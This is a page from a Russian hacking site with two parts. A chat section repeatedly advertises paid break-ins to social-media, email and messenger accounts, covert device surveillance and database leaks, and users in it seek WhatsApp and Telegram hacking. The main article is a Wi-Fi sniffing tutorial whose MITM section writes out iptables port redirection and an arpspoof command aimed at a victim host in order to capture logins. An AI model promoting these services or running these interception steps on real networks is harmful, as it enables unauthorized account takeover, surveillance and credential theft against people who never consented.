Интересное в сети
Форум happy-hack.ru
Мы Вконтакте
Посетители

Сейчас на сайте: 18
Пользователей: 0
Гостей: 16

Пользователи онлайн: 


- отсутствуют

Гости (20 последних): 



Роботы: 

Google
Статистика




Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • cup0l4
    28 мая 2020, 22:39
    Заказать услугу ВЗЛОМА можно по адресу [email protected] / telegram @Strong.knocking
    • cup0l4
      28 мая 2020, 22:39
      Заказать услугу ВЗЛОМА можно по адресу [email protected] / telegram @Strong.knocking

      ^^^ СОЦИАЛКИ:

      vk, odnoklassniki, Facebook, twitter, mamba, instagram, myspace, habrahabr

      Вы всегда можете ЗАКАЗАТЬ ДАННУЮ УСЛУГУ взлома:

      ^^^ ПОЧТОВЫЙ СЕРВИС (если не нашли в списке нужный - спрашивайте)

      yandex, gmail, rambler, mail, yahoo, hotmail, nextmail

      ^^^ Онлайн дневники:

      liveinternet, mylivepage, blogs.tks

      ^^^ Служба обмена мгновенных сообщений:

      ICQ, QiP, WhatsApp, Telegram, Viber

      Если не нашли в списке необходимую услугу - СПРАШИВАЙТЕ!

      Наши Преимущества и Гарантии :

      - Взламываем сайты, рутаем сервера по Вашему заказу;
      - Делаем заливы;
      - Взламываем игровые аккаунты на ресурсы;
      - Установим слежку на любое устройство/выгрузим содержимое;
      - Сливаем базы данных по Вашим тематическим критериям;
      - Беремся за поиск информации любой тематики;
      - Мы гарантируем вашу анонимность;
      - Круглосуточно;
      - Качественно;
      - Быстро;
      - Самые удобные способы оплаты;
      - ОГРОМНАЯ база постоянных клиентов;
      - Работаем даже с самыми сложными и срочными заказами.

      Связь:

      [email protected] / telegram @Strong.knocking

      WhatsApp +79095794784

      Оставляйте Ваши заявки в любом случае, независимо от нашего присутствия в сети. Ответ от нас Вы

      получите в самое короткое время!

      * * * * * * * * * * * * * * * * * * * * * * * * *
      • berlingo
        26 мая 2020, 23:38
        • berlingo
          26 мая 2020, 23:24
          Ребята привет! Подскажите быстрый и качественный парсер почт ?
          • admin
            25 мая 2020, 11:55
            @AcidCult, хочешь купить?
            • AcidCult
              20 мая 2020, 18:35
              @admin, HH давно продан? И был ли продан вообще?
              • admin
                17 мая 2020, 21:16
                @yycxs, на месте
                • yycxs
                  17 мая 2020, 18:53
                  Админы есть?? Срочно ;)
                  • KaSeR
                    13 мая 2020, 18:32
                    взлом телеграм на деньги
                    • sasha2009
                      12 мая 2020, 04:13
                      Хаюшки всем! Есть живые ?
                      • byShiz0
                        12 мая 2020, 03:31
                        @serj359, 2012
                        • byShiz0
                          12 мая 2020, 03:30
                          Привет
                          • HeplMepls
                            12 мая 2020, 00:18
                            • HeplMepls
                              11 мая 2020, 23:56
                              Помогите заработать чуть--чуть
                              • rat_maker
                                11 мая 2020, 23:00
                                @Pokerface, а что конкретно то надо. Я могу посмотреть. Это нелегкое дело вовсе!
                                • Pokerface
                                  8 мая 2020, 22:23
                                  Вечер добрый, кто подскажет есть софтина по взлому WhatsApp
                                  • rat_maker
                                    2 мая 2020, 21:25
                                    Hello братья по разуму
                                    • admin
                                      27 апр 2020, 22:23
                                      А на платформе Epic Game до 30 апреля можно добавить For The King.
                                      • admin
                                        27 апр 2020, 22:21
                                        До 1 мая на сайте Steam вы можете БЕСПЛАТНО добавить в свою коллекцию игр игру Total War: SHOGUN 2
                                        • admin
                                          27 апр 2020, 22:19
                                          Цитата: SArER
                                          Внимание! Обнаружена ошибка
                                          Посетители не имеют доступа для просмотра статей из данного раздела.

                                          Если вы попадаете на такое сообщение значит новость удалена. Сайт был почищен от старого, давно не работающего мусора.
                                          • admin
                                            27 апр 2020, 22:19
                                            Цитата: xer0s2
                                            доброй ночи а как перенсти свой ак на форум? я зарегался там и он не перенсся

                                            Регистрация на сайте и на форуме отдельная.
                                            • SArER
                                              27 апр 2020, 12:35
                                              Внимание! Обнаружена ошибка
                                              Посетители не имеют доступа для просмотра статей из данного раздела.
                                              • SArER
                                                27 апр 2020, 12:35
                                                ЭМ НАЙС
                                                • xer0s2
                                                  27 апр 2020, 02:30
                                                  доброй ночи а как перенсти свой ак на форум? я зарегался там и он не перенсся
                                                  • admin
                                                    26 апр 2020, 01:35
                                                    У кого ещё нет стикеров Lay's, пишем им в ЛС "дай стикеры"

                                                    • Astonreal
                                                      24 апр 2020, 13:46
                                                      А что с сайтом случилось?
                                                      • antohin03
                                                        21 апр 2020, 19:43
                                                        Неужели хх ожил о_О
                                                        • admin
                                                          15 апр 2020, 19:52
                                                          Пишем Привет ВК боту СТС и участвуем в викторине, получаем стикеры

                                                          Ответы на вопросы:
                                                          1. Неправда
                                                          2. Правда
                                                          3. Неправда
                                                          • admin
                                                            15 апр 2020, 12:09
                                                            Цитата: serj359
                                                            Помнишь exploit’a?)

                                                            Помню
                                                            • serj359
                                                              14 апр 2020, 23:50
                                                              ностальджи
                                                              Опрос на сайте
                                                              Как Вы нашли нас?

                                                              Анализ информации внутри сети Wi-Fi

                                                              Автор: admin | Дата: 13-04-2018, 17:10 | Комментариев: 0 | Просмотров: 28 013
                                                              Анализ информации внутри сети Wi-Fi


                                                              Установка и запуск WireShark

                                                              WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:

                                                              sudo apt-get install wireshark


                                                              После установки запустим утилиту. Можно запустить с помощью команды:

                                                              sudo wireshark




                                                              Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.



                                                              1. блок - настройка и управления утилитой.
                                                              2. блок - пакеты, которые были перехвачены.
                                                              3. блок - информация для расшифровки и получения данных с пакетов.


                                                              Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены.

                                                              Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:

                                                              1. ip.proto - протокол 
                                                              2. ip.src - отправитель 
                                                              3. ip.dst - получатель 
                                                              4. ip.addr - любой адрес


                                                              Фильтры поддерживают использование логических операторов и выражений:

                                                              == - присваивание 
                                                              || - логическое или 
                                                              & - логическое и 
                                                              > - больше 
                                                              < - меньше


                                                              На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".

                                                              Пример перехваченного пакета



                                                              Сбор информации

                                                              Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.

                                                              sudo netdiscover


                                                              После этого получаем информацию об участниках сети.

                                                              Участники сети



                                                              Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:

                                                              fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt




                                                              Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:

                                                              ip.addr==192.168.0.100


                                                              Фильтрация по IP



                                                              Или, например, фильтрация по MAC-адресу:

                                                              eth.addr==68:3e:xx:xx:xx:xx


                                                              Фильтрация по MAC-адресу



                                                              Можно комбинировать запросы логическим «или» - ||:

                                                              eth.addr==68:3e:xx:xx:xx:xx || igmp


                                                              Комбинирование двух разных запросов



                                                              MITM-атака

                                                              Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:



                                                              Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:

                                                              sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.
                                                              
                                                              echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов 
                                                              
                                                              iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 
                                                              
                                                              iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282




                                                              Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:

                                                              arpfpoof -i <interface> -t <жертва> <шлюз>


                                                              Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:

                                                              arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1




                                                              Далее с фильтрами и другими данными информация анализируется в WireShark.

                                                              Заключение

                                                              Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.


                                                              Теги: Wi-Fi WireShark netdiscover перехват трафик

                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
                                                              Добавление комментария
                                                              Имя:*
                                                              E-Mail:
                                                              • bowtiesmilelaughingblushsmileyrelaxedsmirk
                                                                heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
                                                                winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
                                                                worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
                                                                expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
                                                                disappointedconfoundedfearfulcold_sweatperseverecrysob
                                                                joyastonishedscreamtired_faceangryragetriumph
                                                                sleepyyummasksunglassesdizzy_faceimpsmiling_imp
                                                                neutral_faceno_mouthinnocent
                                                              Вопрос: Продолжите поговорку "У страха глаза ***"
                                                              Ответ:*
                                                              Введите два слова, показанных на изображении: *